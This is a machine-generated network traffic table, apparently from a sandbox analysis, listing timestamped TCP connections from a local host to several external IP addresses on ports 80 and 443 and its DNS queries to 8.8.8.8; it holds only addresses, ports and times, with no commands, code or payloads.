                                              Jul 26, 2024 23:45:41.424787045 CEST4918280192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:41.429697990 CEST8049182193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:41.517668009 CEST8049180193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:41.543041945 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:41.543103933 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:41.543169022 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:41.543467999 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:41.543493986 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:41.727950096 CEST4918080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.020059109 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:42.081131935 CEST8049182193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:42.101207018 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:42.101244926 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:42.218363047 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:42.218600988 CEST44349183188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:42.218688011 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:42.220113039 CEST49183443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:42.289530993 CEST4918280192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.291476011 CEST8049182193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:42.294935942 CEST4918280192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.540606976 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:42.543735027 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.545442104 CEST8049184132.226.8.169192.168.2.22
                                              Jul 26, 2024 23:45:42.545495987 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:42.547310114 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:42.548670053 CEST8049185193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:42.548723936 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.548789978 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:42.552351952 CEST8049184132.226.8.169192.168.2.22
                                              Jul 26, 2024 23:45:42.553627968 CEST8049185193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:43.327135086 CEST8049184132.226.8.169192.168.2.22
                                              Jul 26, 2024 23:45:43.340100050 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.340153933 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.340214968 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.340459108 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.340492010 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.539527893 CEST8049184132.226.8.169192.168.2.22
                                              Jul 26, 2024 23:45:43.539572954 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:43.814532995 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.817344904 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.817389011 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.939181089 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.939265013 CEST44349186188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:43.939327955 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.939913988 CEST49186443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:43.952377081 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:43.970454931 CEST8049184132.226.8.169192.168.2.22
                                              Jul 26, 2024 23:45:43.970944881 CEST4918480192.168.2.22132.226.8.169
                                              Jul 26, 2024 23:45:44.186233044 CEST8049185193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:44.395447969 CEST8049185193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:44.395625114 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:44.460261106 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:44.460777998 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:44.460825920 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:44.460911989 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:44.465207100 CEST8049187158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:44.465295076 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:44.480416059 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:44.481154919 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:44.481194973 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:44.485352039 CEST8049187158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:44.981574059 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:44.984251022 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:44.984318018 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:45.059883118 CEST8049187158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:45.076153040 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.076178074 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.076232910 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.076469898 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.076481104 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.131036997 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:45.131289005 CEST44349188188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:45.131486893 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:45.135514975 CEST49188443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:45.152615070 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:45.158145905 CEST8049185193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:45.158209085 CEST4918580192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:45.173810005 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:45.178627968 CEST8049190193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:45.178682089 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:45.178761959 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:45.183666945 CEST8049190193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:45.269176960 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:45.540621996 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.543097973 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.543127060 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.672687054 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.672769070 CEST44349189188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:45.672844887 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.673301935 CEST49189443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:45.685033083 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:45.690653086 CEST8049187158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:45.690716028 CEST4918780192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:45.706738949 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:45.711555958 CEST8049191132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:45.711613894 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:45.711668968 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:45.717003107 CEST8049191132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:46.386826992 CEST8049191132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:46.595187902 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:46.605454922 CEST8049191132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:46.605592012 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:46.620621920 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:46.620659113 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:46.620718956 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:46.621052027 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:46.621069908 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:46.833507061 CEST8049190193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:46.895685911 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:46.895772934 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:46.895845890 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:46.896251917 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:46.896286964 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:47.043627977 CEST8049190193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:47.043682098 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:47.090240002 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:47.093430996 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:47.093489885 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:47.219444990 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:47.219501019 CEST44349192188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:47.219551086 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:47.220865011 CEST49192443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:47.233720064 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:47.239237070 CEST8049191132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:47.239280939 CEST4919180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:47.247977972 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.248083115 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.248156071 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.248701096 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.248738050 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.354635000 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:47.357110023 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:47.357131958 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:47.482007027 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:47.482065916 CEST44349193188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:47.482110023 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:47.482485056 CEST49193443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:47.495728016 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:47.501351118 CEST8049190193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:47.501401901 CEST4919080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:47.518502951 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:47.523556948 CEST8049195193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:47.523612022 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:47.523673058 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:47.528439999 CEST8049195193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:47.874897957 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.874967098 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.883709908 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.883718967 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.884067059 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.886822939 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:47.932539940 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:47.997226000 CEST8049195193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:48.018897057 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.018937111 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.019011021 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.019294977 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.019309044 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.132366896 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:48.132437944 CEST44349194149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:48.132530928 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:48.132940054 CEST49194443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:48.201951027 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:48.203905106 CEST8049195193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:48.203972101 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:48.506793022 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.509236097 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.509259939 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.664441109 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.664545059 CEST44349196188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:48.664921999 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.665353060 CEST49196443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:48.676703930 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:48.689225912 CEST8049195193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:48.689359903 CEST4919580192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:48.697977066 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:48.703497887 CEST8049197132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:48.703563929 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:48.703653097 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:48.708513021 CEST8049197132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:49.378026962 CEST8049197132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:49.391849041 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:49.391937017 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:49.392030001 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:49.392307043 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:49.392328024 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:49.587779999 CEST8049197132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:49.590379953 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:49.590421915 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:49.881721973 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:49.885092974 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:49.885158062 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:50.032752037 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:50.032824039 CEST44349198188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:50.033018112 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:50.033325911 CEST49198443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:50.045794964 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:50.051107883 CEST8049197132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:50.051167011 CEST4919780192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:50.066366911 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:50.071244955 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:50.071309090 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:50.071681023 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:50.076431036 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:51.685719967 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:51.685988903 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:51.686393023 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:51.686407089 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:51.686536074 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:51.686778069 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:51.686853886 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:51.701339960 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:51.701406002 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:51.701476097 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:51.701832056 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:51.701865911 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:52.169359922 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:52.173000097 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:52.173027992 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:52.313321114 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:52.313591957 CEST44349200188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:52.313710928 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:52.314001083 CEST49200443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:52.378209114 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:52.383690119 CEST8049199132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:52.383764982 CEST4919980192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:52.393471956 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:52.398372889 CEST8049201193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:52.398417950 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:52.398821115 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:52.403589010 CEST8049201193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:52.860874891 CEST8049201193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:52.873503923 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:52.873596907 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:52.873668909 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:52.873960972 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:52.873999119 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:53.069170952 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:53.071516037 CEST8049201193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:53.071574926 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:53.365447044 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:53.374777079 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:53.374815941 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:53.508024931 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:53.508248091 CEST44349202188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:53.508320093 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:53.508639097 CEST49202443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:53.517083883 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:53.522593021 CEST8049201193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:53.522655010 CEST4920180192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:53.530767918 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:53.530797958 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:53.530858040 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:53.531322956 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:53.531339884 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.357132912 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.357323885 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:54.363334894 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:54.363347054 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.363801956 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.366568089 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:54.412503958 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.603488922 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.603717089 CEST44349203149.154.167.220192.168.2.22
                                              Jul 26, 2024 23:45:54.603787899 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:45:54.604264975 CEST49203443192.168.2.22149.154.167.220
                                              Jul 26, 2024 23:46:46.517594099 CEST8049180193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:46:46.517715931 CEST4918080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:46:47.080703020 CEST8049182193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:46:47.080770016 CEST4918280192.168.2.22193.122.6.168

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 26, 2024 23:45:03.630995989 CEST5456253192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:04.632219076 CEST5456253192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:04.830096960 CEST53545628.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:04.934381962 CEST53545628.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:06.556224108 CEST5291753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:07.462266922 CEST53529178.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:07.464293003 CEST6275153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:07.840570927 CEST53627518.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:12.067383051 CEST5789353192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:12.076077938 CEST53578938.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:12.079323053 CEST5482153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:12.181380987 CEST53548218.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:13.343615055 CEST5471953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:13.351985931 CEST53547198.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:13.353574038 CEST4988153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:13.458283901 CEST53498818.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:14.731673956 CEST5499853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:14.743086100 CEST53549988.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:14.748781919 CEST5278153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:14.845243931 CEST53527818.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:19.707108021 CEST6392653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:19.716862917 CEST53639268.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:24.043891907 CEST6551053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:24.051151037 CEST53655108.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:24.053987980 CEST6267253192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:24.060973883 CEST53626728.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:27.972532034 CEST5647553192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:27.979532957 CEST53564758.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:28.104296923 CEST4938453192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:28.114315033 CEST53493848.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:28.175985098 CEST5484253192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:28.185820103 CEST53548428.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:28.237948895 CEST5810553192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:28.251365900 CEST53581058.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:30.739588022 CEST6492853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:30.750123978 CEST53649288.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:35.180413008 CEST5739053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:35.186748981 CEST53573908.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:35.197536945 CEST5809553192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:35.203803062 CEST53580958.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:35.707544088 CEST5426153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:35.718290091 CEST53542618.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:36.460616112 CEST6050753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:36.466989040 CEST53605078.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:36.615905046 CEST5044653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:36.624397993 CEST53504468.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:36.718583107 CEST5593953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:36.725044966 CEST53559398.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:36.768357038 CEST4960853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:36.774833918 CEST53496088.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:37.864142895 CEST6148653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:37.871150017 CEST53614868.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:39.764463902 CEST6245353192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:39.771265030 CEST53624538.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:39.834836960 CEST5056853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:39.842966080 CEST53505688.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:39.856924057 CEST5056853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:39.863590002 CEST53505688.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:40.729053974 CEST6146753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:40.735959053 CEST53614678.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:41.384654999 CEST6161853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:41.401194096 CEST53616188.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:41.401381969 CEST6161853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:41.407588005 CEST53616188.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:41.412700891 CEST5442253192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:41.419262886 CEST53544228.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:41.523608923 CEST5207453192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:41.535531044 CEST53520748.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:41.535685062 CEST5207453192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:41.542736053 CEST53520748.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.179760933 CEST5033753192.168.2.228.8.8.8
